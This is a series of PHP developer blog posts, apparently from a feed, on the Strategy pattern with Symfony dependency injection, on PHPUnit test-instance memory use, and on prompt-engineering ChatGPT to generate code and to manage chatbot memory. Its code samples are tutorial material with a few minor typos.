$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
private array $retrieveDataForReports = [];
public function register(RetrieveDataForReport $retrieveDataForReport): void
{
$this->retrieveDataForReports[] = $retrieveDataForReport;
}
}
If the order in which the reports are built is important, then we need to add a bit of extra logic:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->getSortedRetrieveDataForReports() as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getReportName();
$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
private const int DEFAULT_PRIORITY = 100;
private const array NOT_SORTED = [];
private array $unsortedRetrieveDataForReports = [];
private array $sortedRetrieveDataForReports = self::NOT_SORTED;
public function register(
RetrieveDataForReport $retrieveDataForReport,
int $priority = self::DEFAULT_PRIORITY,
): void {
$this->unsortedRetrieveDataForReports[$priority][] = $retrieveDataForReport;
$this->sortedRetrieveDataForReports = self::NOT_SORTED;
}
private function getSortedRetrieveDataForReports(): void
{
if (self::NOT_SORTED === $this->sortedRetrieveDataForReports)) {
// Strategies with higher priority need to be executed before the ones with lower priority
krsort($this->unsortedRetrieveDataForReports);
// Flattens strategies by removing the "priority" dimension from the array
$this->sortedRetrieveDataForReports = array_merge(...$this->unsortedRetrieveDataForReports);
}
return $this->sortedRetrieveDataForReports;
}
}
Have you heard of the Symfony component EventDispatcher? While it is a well known implementation of the Observer design pattern, the way the EventListeners (strategies) are registered and executed in the EventDispatcher (context) is very similar to this.
Speaking of Symfony, how would we configure the Dependency Injection Container for this service? First, let's write the YAML configuration:
services:
'EmailDailyReports':
arguments:
- '@BuildSpreadsheet'
- '@Mailer'
- '@WriteSpreadsheet'
calls:
- register:
- '@RetrieveDataForReportOne'
- 200
- register:
- '@RetrieveDataForReportTwo'
- 100
'BuildSpreadsheet': ~
'Mailer': ~
'WriteSpreadsheet': ~
'RetrieveDataForReportOne': ~
'RetrieveDataForReportTwo': ~
Note that we need to write the priorities here in the EmailDailyReports
service definition. The calls section is fine for now, as we only have two
Strategies.
But what if we need to add 1 more report? 2 more reports? 30 more reports?
The entire calls section can be removed from the configuration,
by creating a CompilerPass:
<?php
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Reference;
class RegisterRetrieveDataForReportsCompilerPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container): void
{
// Get Context service definition
$emailDailyReports = $container->findDefinition(EmailDailyReports::class);
// Get iterable of all the Strategy service definitions (they'll be tagged with the Strategy interface FQCN)
$retrieveDataForReports = $container->findTaggedServiceIds(RetrieveDataForReport::class);
foreach ($retrieveDataForReports as $id => $tags) {
// In theory you can tag a service many times with the same tag,
// but in our case here, there'll only be one tag
foreach ($tags as $retrieveDataForReport) {
// call the Setter Injection on the Context service definition
$emailDailyReports->addMethodCall('register', [
new Reference($id),
$retrieveDataForReport['priority'] ?? EmailDailyReports::DEFAULT_PRIORITY,
]);
}
}
}
}
Also, make sure to register the CompilerPass in the Bundle:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class MyBundle extends Bundle
{
public function build(ContainerBuilder $container): void
{
parent::build($container);
$container->addCompilerPass(new RegisterRetrieveDataForReportsCompilerPass());
}
}
Note that now the priorities need to be defined in the tags of the RetrieveDataForReport service definitions:
services:
'EmailDailyReports':
arguments:
- '@BuildSpreadsheet'
- '@Mailer'
- '@WriteSpreadsheet'
'BuildSpreadsheet': ~
'Mailer': ~
'WriteSpreadsheet': ~
'RetrieveDataForReportOne':
tags:
- { name: 'RetrieveDataForReport', priority: 200 }
'RetrieveDataForReportTwo':
tags:
- { name: 'RetrieveDataForReport', priority: 100 }
Defining manually the service definition for every classes in our project is all fun and games, and having to set tags is fine for now, as we only have two Strategies.
But what if we need to add 1 more report? 2 more reports? 30 more reports?
Since Symfony 3.3, the Dependency Injection's autowiring will inject dependencies named after the type of the service arguments.
This works great for the constructor of EmailDailyReports (note the
conspicuously missing EmailDailyReports, BuildSpreadsheet, Mailer and
WriteSpreadsheet):
services:
_defaults:
autowire: true
'RetrieveDataForReportOne':
tags:
- { name: 'RetrieveDataForReport', priority: 200 }
'RetrieveDataForReportTwo':
tags:
- { name: 'RetrieveDataForReport', priority: 100 }
By adding _defaults.autowire: true, we were able to remove 8 lines of configuration!
Then, since Symfony 5.3,
it is possible to automatically tag all the implementations,
by using the #[AutoconfigureTag] attribute on the interface:
<?php
use Symfony\Component\DependencyInjection\Attribute\AutoconfigureTag;
#[AutoconfigureTag]
interface RetrieveDataForReport
{
public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array;
public function getName(): string;
public static function getDefaultPriority(): int;
}
This only works if _defaults.autoconfigure is set to true in the config
(note the conspicuously missing RetrieveDataForReportOne and RetrieveDataForReportTwo):
services:
_defaults:
autowire: true
autoconfigure: true
You might have noticed that we've added a public static function getDefaultPriority(): int
method to our interface. Since the priorities configuration is gone from YAML,
the have to be returned by the implementations:
RetrieveDataForReportOne::getDefaultPriority() needs to return 200RetrieveDataForReportTwo::getDefaultPriority() needs to return 100Finally, since Symfony 5.3,
it is also possible to inject an iterator containing all services that have a specific tag,
by using the #[TaggedIterator] attribute. Let's use it in the "Context" class:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
#[TaggedIterator(RetrieveDataForReport::class, defaultPriorityMethod: 'getDefaultPriority')]
private iterable $retrieveDataForReports,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->retrieveDataForReports as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getReportName();
$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
}
This means we can remove the CompilerPass (and unregister it from the Bundle).
You'll also note that we've removed from EmailDailyReports the following methods:
register(): the "Strategies" are no longer injected one by onegetSortedRetrieveDataForReports(): TaggedIterator supports sorting by priorities,
but it requires the "Strategies" to have a static method that returns the priorityTo sum up:
[#AutoconfigureTag]iterable that contains all tagged "Strategy" implementations
in the "Context"'s constructor with the attribute #[TaggedIterator(<tag>)]autowire and autoconfigure parameters to be true in the DIC configurationThe use case doesn't demonstrate how to avoid multiple use statements, but this can be done by adding a "predicate" method to the "Strategy": this will allow the "Context" to only execute a sub set of the strategies.
It's even possible to only execute the first strategy,
by adding a break in the loop.
I've tried to synthesize as much information as possible at the top of this article, in the ironically (yet aptly) named "TL;DR" section.
I hope this'll prove useful to you (it'll definitely be for me!).
]]>Let's set up a project to verify our claim:
mkdir /tmp/phpunit-is-a-cake && cd "$_"
composer init --no-interaction --name 'follow/the-white-rabbit' --type project --autoload '.'
composer require -o --dev phpunit/phpunit:^9.6
Next we write a catchy test:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
class CatchyTest extends TestCase
{
private string $letMeCountThemForYou = '';
public function __construct($name = null, array $data = [], $dataName = '')
{
parent::__construct($name, $data, $dataName);
echo "How many times have I, how many times have I, how many times have I been instanciated?\n";
}
public function __destruct()
{
echo "Till the morning light\n";
}
public function testOne(): void
{
$this->letMeCountThemForYou .= 'One';
echo "{$this->letMeCountThemForYou}\n";
}
public function testTwo(): void
{
$this->letMeCountThemForYou .= 'Two';
echo "{$this->letMeCountThemForYou}\n";
}
/**
* @dataProvider provider
*/
public function testMore($times): void
{
$this->letMeCountThemForYou .= $times;
echo "{$this->letMeCountThemForYou}\n";
}
public function provider(): array
{
return [['Three'], ['Four'], ['Five'], ['Six'], ['Seven'], ['Eight']];
}
}
Finally we run the tests to see the output:
> phpunit ./CatchyTest.php
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
Till the morning light
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
How many times have I, how many times have I, how many times have I been instanciated?
PHPUnit 9.6.19 by Sebastian Bergmann and contributors.
ROne
RTwo
RThree
RFour
RFive
RSix
RSeven
R 8 / 8 (100%)Eight
// [...]
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
And Bob's your uncle! Hang on, what?
The constructor has been called 3 (test methods) + 6 (items in data provider) = 9 times and we can observe that the class attribute's value isn't shared between the test methods but gets reset every time.
And those instances stay alive until the vey end of the run, meaning a concerningly increasing memory usage througout the test suite, which also slows it down!
There's a hack that's been around for decades to free the memory and speed up the test suites:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
abstract class BaseTestCase extends TestCase
{
protected function tearDown()
{
$refl = new ReflectionObject($this);
foreach ($refl->getProperties() as $prop) {
if (!$prop->isStatic() && 0 !== strpos($prop->getDeclaringClass()->getName(), 'PHPUnit\\')) {
$prop->setAccessible(true);
$prop->setValue($this, null);
}
}
}
}
The tearDown method is called after each test method, so it's a good place to unset class attributes.
To avoid having to think about it, a catch all solution using relfection can be put inside a custom BaseTestCase
that'll be extended by all our test classes.
And indeed most of the code bases don't directly extend PHPUnit's TestCase, for example Symfony's documentation suggest to use FrameworkBundle's KernelTestCase.
But what does it do exactly?
Here's a highly opinionated summary of its code:
<?php
namespace Symfony\Bundle\FrameworkBundle\Test;
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpKernel\KernelInterface;
abstract class KernelTestCase extends TestCase
{
protected static ?KernelInterface $kernel = null;
protected static function bootKernel(): KernelInterface
{
static::$kernel = new \AppKernel('test', true);
$kernel->boot();
return static::$kernel;
}
protected function tearDown(): void
{
if (null !== static::$kernel) {
static::$kernel->shutdown();
static::$kernel = null;
}
}
}
Symfony's HttpKernel is stateless, so being able to boot it (which is slow) only once and store it in a static attribute of a TestCase that all our functional test implement is great!
However calling bootKernel will always return a new instance of the application kernel and will always boot it,
while the tearDown method also makes sure to nuke it after each test method...
Now I can't pretend to know the reason behind this (maybe assuming that applications are stateful?), nor am I familiar with all the different applications out there and their specific use cases, but that seems very unfortunate to me.
To fix it, we can rewrite it as follow:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpKernel\KernelInterface;
abstract class MyTestCase extends TestCase
{
protected static ?KernelInterface $kernel = null;
protected static function getKernel(): KernelInterface
{
if (null === static::$kernel) {
static::$kernel = new \AppKernel('test', true);
$kernel->boot();
}
return static::$kernel;
}
}
We got rid of the kernel shutdown shenanigans (can be called manually if needed), and made sure the Kernel is instanciated (and booted) only once.
But why have this as part of the TestCase? This should be extracted into its own class:
<?php declare(strict_types=1);
use Symfony\Component\HttpKernel\KernelInterface;
class KernelSingleton
{
protected static ?KernelInterface $kernel = null;
protected static function get(): KernelInterface
{
if (null === static::$kernel) {
static::$kernel = new \AppKernel('test', true);
$kernel->boot();
}
return static::$kernel;
}
}
I know, I know. The Singleton desing pattern has been receiving a lot of bad rap over the years. But here, it's a legitimate use case!
What have we learned?
That each PHPUnit test method is run in isolation inside its own Test Class instance, so class attribute values will rapidly consume more and more memory (and slow down the test suite), and they cannot be shared between two test methods unless you make them static.
And perhaps consider using Singletons instead of relying on "FrameworkTestCase".
As for PHPUnit's setUp method, in your opinion, is it best described as "executed before each test method", or as "executed everytime the test class is instanciated"?
]]>In my quest to find a use for ChatGPT in my day to day developer activity, I've finally found a helpful scenario!
Let me walk you through my findings about ChatGPT and its "Spec Gen" capacity, so we can learn a thing or two.
When tasked to write a feature, I first write a unit test that specifies the behaviour, for example:
<?php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
private const FILENAME = '/tmp/file.txt';
private const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem): void
{
$this->beConstructedWith($filesystem);
}
function it_creates_new_files(File $file, Filesystem $filesystem): void
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
When using phpspec, especially with the extension spec-gen, running the test will bootstrap for me the corresponding class:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesytem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open(string $argument1, bool $argument2)
{
}
}
That's pretty good, but it could be better: what if it was able to generate the complete code?
Let's forget about phpspec and use instead PHPUnit, but still with the Prophecy Mocking framework.
Let's ask ChatGPT. Here's the priming prompt:
USER: Act as an expert PHP developer, who's been writing high quality API code for 20 years. Acknowledge with "ok".
Because ChatGPT's Large Language Model (LLM) is able to generate a wide range of text (conversation, essays, movie script, poetry, etc), assigning it a role helps it narrow down its context, hence improving its accuracy for the task we want it to complete: writing PHP code, on a professional level (persona/role prompt engineering technique).
We also need to consider the Goldfish Memory issue of ChatGPT: it only takes into account the last ~4000 tokens to generate its response, so asking it to give us a short reply helps us save some space.
ChatGPT: ok
LLMs perform better when given some examples, and indeed before asking it to generate code we might want to give ChatGPT some of our code samples (X-Shot prompt engineering technique).
Since coding also requires some level of logic, it is also helpful to include reasoning steps (Chain of Thought prompt engineering technique).
Similarly, asking the LLM to first generate some topic related knowledge, and then reuse that in the further prompts will also increase our success rate (Generated Knowledge prompt engineering technique).
With this in mind, here's the second prompt that provides a test class example:
USER: Here's an example of test class from the project you're working on:
<?php
declare(strict_types=1);
namespace tests\Ssc\Btlr\Cht\Message\Templates\Prompts;
use Ssc\Btlr\App\Filesystem\ReadFile;
use Ssc\Btlr\App\Template\Replace;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Templates\Prompts\Template;
use tests\Ssc\Btlr\AppTest\BtlrServiceTestCase;
class TemplateTest extends BtlrServiceTestCase
{
/**
* @test
*/
public function it_creates_prompt_from_template(): void
{
// Fixtures
$thoseParameters = [
'last_messages' => 'USER (1968-04-02T18:40:23+00:00): Write code for me, please',
];
$forType = Type::AUGMENTED_PROMPT;
$withConfig = [
'chunk_memory_size' => 15,
'llm_engine' => 'chatgpt-gpt-3.5-turbo',
'logs_filename' => './var/cht/logs',
'prompt_templates_filename' => './templates/cht/prompts',
];
$template = "LAST MESSAGES:\n%last_messages%\nBTLR:\n";
$prompt = "LAST MESSAGES:\n{$thoseParameters['last_messages']}\nBTLR:\n";
$data = [
'entry' => $prompt,
];
// Dummies
$readFile = $this->prophesize(ReadFile::class);
$replace = $this->prophesize(Replace::class);
$writeLog = $this->prophesize(WriteLog::class);
// Stubs & Mocks
$readFile->in("{$withConfig['prompt_templates_filename']}/{$forType['name']}.txt")
->willReturn($template);
$replace->in($template, $thoseParameters)
->willReturn($prompt);
$writeLog->for($data, $forType, $withConfig)
->shouldBeCalled();
// Assertion
$template = new Template(
$readFile->reveal(),
$replace->reveal(),
$writeLog->reveal(),
);
self::assertSame($prompt, $template->replace(
$thoseParameters,
$forType,
$withConfig,
));
}
}
USER: Acknowledge by describing how the use of fixtures, dummies, stubs, mocks and assertions allow to make sure the tested code is behaving as expected. And note the use of the special BtlrServiceTestCase parent class for
TemplateTest.
By the way, the code is from my Super Secret Code project Btlr.
Here's ChatGPT's response:
ChatGPT: In this test class, fixtures are used to provide the necessary data for testing the
Templateclass. The parameters and configuration are defined in$thoseParametersand$withConfigrespectively, and the template and prompt strings are defined in$templateand$prompt.Dummies are used to provide the interface of the
ReadFile,Replace, andWriteLogclasses, without providing any actual implementation, since these classes are not the focus of the test.Stubs are used to replace the implementation of
ReadFileandReplaceclasses, by returning a fixed value when their respective methods are called. This ensures that the expected values are used for testing theTemplateclass.Mocks are used to verify that the
WriteLogclass is called with the expected parameters. TheshouldBeCalled()method ensures that thefor()method ofWriteLogclass is actually called during the test.Finally, the assertion compares the result returned by the
replace()method of theTemplateclass with the expected prompt string.The
BtlrServiceTestCaseclass is a special parent class that sets up a test environment for the Btlr service, which can include initializing dependencies, connecting to databases, and setting up configurations. This helps to ensure that tests are run in a consistent and isolated environment, and makes it easier to write tests for the Btlr service.
ChatGPT doesn't have access to the project and its code, it only knows what we've provided in the conversation so far.
So for example it took a wild guess at what BtlrServiceTestCase does and got
it wrong, but for our purpose this is good enough.
The third prompt is an example of the corresponding class:
USER: When tasked with generating the corresponding
Templateclass, from the aboveTemplateTesttest class, here's the code you wrote:
<?php
declare(strict_types=1);
namespace Ssc\Btlr\Cht\Message\Templates\Prompts;
use Ssc\Btlr\App\Filesystem\ReadFile;
use Ssc\Btlr\App\Template\Replace;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
class Template
{
public function __construct(
private ReadFile $readFile,
private Replace $replace,
private WriteLog $writeLog,
) {
}
public function replace(
array $thoseParameters,
array $forType,
array $withConfig,
): string {
$template = $this->readFile->in(
"{$withConfig['prompt_templates_filename']}/{$forType['name']}.txt",
);
$prompt = $this->replace->in($template, $thoseParameters);
$this->writeLog->for([
'entry' => $prompt,
], $forType, $withConfig);
return $prompt;
}
}
USER: Acknowledge by describing how the test class got translated into its corresponding class.
To which ChatGPT replies:
ChatGPT: The
TemplateTesttest class served as a guide for implementing theTemplateclass.First, the constructor of
Templateclass takes three dependencies, which are also injected in theTemplateTestclass as dummies or mocks.Next, the
replace()method ofTemplateclass has the same signature as the test methodit_creates_prompt_from_template(), with the addition of a return type declaration for the prompt string.The implementation of
replace()method inTemplateclass uses the injectedReadFileinstance to read the template string from the filesystem, using the$forType['name']parameter to construct the file path. It then uses the injectedReplaceinstance to replace placeholders in the template with values provided in the$thoseParametersarray, resulting in a$promptstring.Finally, the method calls the injected
WriteLoginstance with the$prompt,$forType, and$withConfigparameters, which logs the prompt for the given type and configuration.Overall, the implementation of the
Templateclass closely follows the structure of theTemplateTestclass, and the use of dependency injection ensures that the class can be easily tested in isolation from its dependencies.
With ChatGPT noting that the corresponding class closely follows the structure of its test, it should be now ready.
Let's give it a new test class, and ask it to generate the corresponding code:
USER: Brilliant. Now, in the same coding style as
TemplateTestandTemplate, you are tasked to write a the corresponding code for the followingReplyTesttest class:
<?php
declare(strict_types=1);
namespace tests\Ssc\Btlr\Cht\Message;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Memory\Consolidate;
use Ssc\Btlr\Cht\Message\Reply;
use Ssc\Btlr\Cht\Message\Reply\Augment;
use Ssc\Btlr\Cht\Message\Reply\UsingLlm;
use tests\Ssc\Btlr\AppTest\BtlrServiceTestCase;
class ReplyTest extends BtlrServiceTestCase
{
/**
* @test
*/
public function it_replies_to_user_prompt_using_llm(): void
{
// Fixtures
$userPrompt = 'Write code for me, please';
$withConfig = [
'chunk_memory_size' => 15,
'llm_engine' => 'chatgpt-gpt-3.5-turbo',
'logs_filename' => './var/cht/logs',
'prompt_templates_filename' => './templates/cht/prompts',
];
$userPromptData = [
'entry' => $userPrompt,
];
$augmentedPrompt = "USER: {$userPrompt}\nBLTR:";
$modelCompletion = "I'm sorry, dev. I'm afraid I can't do that.";
$modelCompletionData = [
'entry' => $modelCompletion,
'llm_engine' => $withConfig['llm_engine'],
];
// Dummies
$augment = $this->prophesize(Augment::class);
$consolidate = $this->prophesize(Consolidate::class);
$usingLlm = $this->prophesize(UsingLlm::class);
$writeLog = $this->prophesize(WriteLog::class);
// Stubs & Mocks
$writeLog->for($userPromptData, Type::USER_PROMPT, $withConfig)
->shouldBeCalled();
$augment->the($userPrompt, $withConfig)
->willReturn($augmentedPrompt);
$usingLlm->complete($augmentedPrompt)
->willReturn($modelCompletion);
$writeLog->for($modelCompletionData, Type::MODEL_COMPLETION, $withConfig)
->shouldBeCalled();
$consolidate->memories($withConfig)
->shouldBeCalled();
// Assertion
$reply = new Reply(
$augment->reveal(),
$consolidate->reveal(),
$usingLlm->reveal(),
$writeLog->reveal(),
);
self::assertSame($modelCompletion, $reply->to(
$userPrompt,
$withConfig,
));
}
}
USER: Acknowledge by generating the code for the
Replyclass.
And here's what ChatGPT came up with:
ChatGPT: Sure thing! Here's the code for the
Replyclass based on theReplyTesttest class:
<?php
declare(strict_types=1);
namespace Ssc\Btlr\Cht\Message;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Memory\Consolidate;
use Ssc\Btlr\Cht\Message\Reply\Augment;
use Ssc\Btlr\Cht\Message\Reply\UsingLlm;
class Reply
{
public function __construct(
private Augment $augment,
private Consolidate $consolidate,
private UsingLlm $usingLlm,
private WriteLog $writeLog,
) {
}
public function to(string $userPrompt, array $withConfig): string
{
$userPromptData = [
'entry' => $userPrompt,
];
// Augment the user prompt
$augmentedPrompt = $this->augment->the($userPrompt, $withConfig);
// Use LLM to generate a model completion
$modelCompletion = $this->usingLlm->complete($augmentedPrompt);
// Log the user prompt and model completion
$this->writeLog->for($userPromptData, Type::USER_PROMPT, $withConfig);
$modelCompletionData = [
'entry' => $modelCompletion,
'llm_engine' => $withConfig['llm_engine'],
];
$this->writeLog->for($modelCompletionData, Type::MODEL_COMPLETION, $withConfig);
// Consolidate the memories
$this->consolidate->memories($withConfig);
return $modelCompletion;
}
}
ChatGPT: This
Replyclass has atomethod that takes a user prompt and a configuration array as input, and returns the model completion generated by LLM. TheReplyclass constructor takes in four dependencies:Augment,Consolidate,UsingLlm, andWriteLog, and stores them as private properties. Thetomethod then uses these dependencies to augment the user prompt, generate the model completion, log both the user prompt and the model completion, and consolidate the memories.
Which is pretty much spot on.
I'd personnally have written something slightly different (no comments, have
writeLog for the user prompt at the begining of the method, and possibly
not have any intermediate variables).
But I can easily apply those changes!
Thanks to Prompt Engineering (with techniques such as Role / Persona priming prompt, X-Shot, Chain of Thought and Generated Knowledge), it is possible to ask ChatGPT to generate code.
I'm personally using the following prompts to generate the corresponding code for a given Test Class.
Priming Prompt:
Act as an expert PHP developer, who's been writing high quality API code for 20 years. Acknowledge with "ok".
Test Class example prompt:
Here's an example of test class from the project you're working on:
%example_test_class_code%Acknowledge by describing how the use of fixtures, dummies, stubs, mocks and assertions allow to make sure the tested code is behaving as expected. And note the use of the special BtlrServiceTestCase parent class for
%example_test_class_name%.
Corresponding class example prompt:
When tasked with generating the corresponding
%example_class_name%class, from the above%%example_test_class_nametest class, here's the code you wrote:
%example_class_code%Acknowledge by describing how the test class got translated into its corresponding class.
Code generation request from Test Class prompt:
Brilliant. Now, in the same coding style as
%example_test_class_name%and%example_class_name%, you are tasked to write a the corresponding code for the following%test_class_name%test class:
%test_class_code%Acknowledge by generating the code for the
%class_name%class.
Now, what if you're not practicing Test Driven Development?
I suppose you can tweek it to get ChatGPT to generate tests for you:
All in all, the exploration of ChatGPT's text generation potential turned out to be quite worthwhile, as I ended up finding a practical use case for it in my day to day developer activity.
Yet I suspect there's plenty more scenarions where ChatGPT can help, so I guess the quest continues.
]]>In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this article: a 175-Billion-Parameter Goldfish, from Allen Pike.
Granted, this doesn't bring me anywhere close to my goal... Yet, this peaked my developer interest, by opening a window on some of the inner workings of ChatGPT.
Let me walk you through my findings about ChatGPT and its Goldfish Memory problem, so we can learn a thing or two.
When using ChatGPT, have you often encountered the frustrating "Goldfish Memory" issue, where it forgets the early conversation's context, resulting in responses that appear unrelated or inappropriate?
This problem is due to how Large Language Models (LLMs), like OpenAI's GPT, work.
They fundamentally are stateless functions that accept one prompt as an input, and return a completion as an ouptut (I believe the output actually also contains the prompt).
Consider the following first "user" prompt:
Hi, my name is Loïc
And its completion:
Hello Loïc, it's nice to meet you! How can I assist you today?
Now, if we were to send the following second user prompt:
What is my name?
The LLM wouldn't be able to return the expected completion Your name's Loïc,
because they only accept one single prompt, and the name is missing from that
second user prompt.
To build a chat system similar to ChatGPT, instead of sending directly the user prompt to the LLM, we can create an "augmented" prompt which contains all the previous user prompts and their completions, as well as the new user prompt, in a conversation format:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
Chatbot:
By sending this augmented prompt to the LLM, we'll now be able to get the
expected completion Your name's Loïc.
But LLMs don't support unlimited sized prompts...
For the sake of the example, let's say the size limit is 5 lines, and the conversation continued as follow:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
Chatbot: Your name's Loïc
User: I'm a Lead Developer, my tech stack is: PHP, Symfony, PostgresSQL and git
Chatbot: Do you have any specific questions related to your tech stack?
User: I also follow these methodologies: SCRUM, TDD and OOP
Chatbot: Do you have any topics related to those methodologies that you'd like to discuss?
User: What is my name?
Chatbot:
Because of the 5 lines limit, the chat system needs to truncate the augmented prompt before sending it to the LLM. A common solution seems to only keep the latest messages. Which means the LLM would end up only getting the following prompt:
Chatbot: Do you have any specific questions related to your tech stack?
User: I also follow these methodologies: SCRUM, TDD and OOP
Chatbot: Do you have any topics related to those methodologies that you'd like to discuss?
User: What is my name?
Chatbot:
And this is why ChatGPT is not able to answer the expected Your name's Loïc.
Note: at the time of writing this article, ChatGPT's limit is shared between the prompt and the completion: * for the
gpt-3.5-turbomodel, the token limit is 4096 * forgpt-4it's 8192 Before being sent to the LLM, the input text is broken down into tokens:Hi, my name is Loïcis broken down into the following dictionary['Hi', ',', ' my', ' name', ' is', ' Lo', 'ï', 'c'], which is then converted into the following tokens[17250, 11, 616, 1438, 318, 6706, 26884, 66]. A single word might be broken down into multiple tokens, and tokenisation varies between models. The rule of thumb is to consider that a token is equivalent to 3/4 of a word.
So. Where do we go from here? How do we enable Infinite Memory for chatbots, and more broadly LLMs?
One solution would be to periodically summarize parts of the conversation.
The summarization task itself can be done in a separate "summarizing" prompt:
Summarize the following conversation in a short sentence, in the past tense:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
Chatbot: Your name is Loïc
Which should result in a completion similar to:
The user introduced themselves as Loïc, and the chatbot confirmed their name when asked.
The augmented prompt would then contain the summaries of older messages, as well as recent ones:
Previously:
The user introduced themselves as Loïc, and the chatbot confirmed their name when asked.
The user discussed their tech stack (PHP, Symfony, PostgresSQL and Git) and methodologies (SCRUM, TDD and OOP) as a Lead Developer, and the chatbot asked if they have any specific questions related to them.
User: What is my name?
Chatbot:
Now the LLM should be able to give a completion equivalent to:
Your name is Loïc. Is there anything else I can help you with related to your tech stack or methodologies as a Lead Developer?
And that's the gist of it!
Augmenting the prompt with recent messages, as well as summaries of related older ones, can allow LLMs to have Infinite Memory!
And that's when the "build a pet project" part of my brain started tingling, sometimes I just can't resist the urge to build something to get a better grasp on a concept that's intriguing me...
So I've started to code a small CLI app (with PHP and Symfony of course) to explore the concepts.
There definitely are some challenges and limits to the summarization approach.
First would be how to select the chunks of conversation to summarize... Do we create a new summary:
Next is what summary to include in the prompt:
Which then brings another rabbit hole, namely how to search for relevant summaries:
More on that once I've done some progress on the pet project. Anyway.
All in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
]]>In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this online course website: Learn Prompting, an initiative lead by Sander Schulhoff, with contributions from Towards AI.
Granted, this doesn't bring me anywhere close to my goal... Yet, this is in stark contrast to all the resources that I've found so far, which are usually "hey I tried this hack and it worked", with no explanations on why.
Let me walk you through the different Prompt Engineering techniques, and why they work, with some academic backing, so we can learn a thing or two.
Note: It was extremely tempting to describe how ChatGPT works, but I didn't want the explanations to detract from the focus of the article (which is academic backed prompt engineering). I recommend these short articles for a detailed explanations: * GPT 3.5 model * Everything I (Vicki Boykis) understand about ChatGPT
X-Shot prompting allows Large Language Models to improve their accuracy, on previously unseen data, without the need to update their training parameters, by including examples in the prompt:
Extract the brand, product name and format from this item "Magnum White Chocolate Ice Cream 8 x 110 ml":
* brand: Magnum
* product name: White Chocolate Ice Cream
* format: 8 x 110 ml
Extract the brand, product name and format from this item "Birds Eye Garden Peas, 375g (Frozen)":
* brand: Birds Eye
* product name: Garden Peas
* format: 375g
Extract the brand, product name and format from this item "PG tips 160 Original Tea Bags":
* brand: PG tips
* product name: Original Tea Bags
* format: 160
Extract the brand, product name and format from this item "233g, Golden Eggs Chocolate Egg, Galaxy":
There's a distinction between Few-Shot, One-Shot and Zero-Shot prompting (referring to how many examples are included in the prompt).
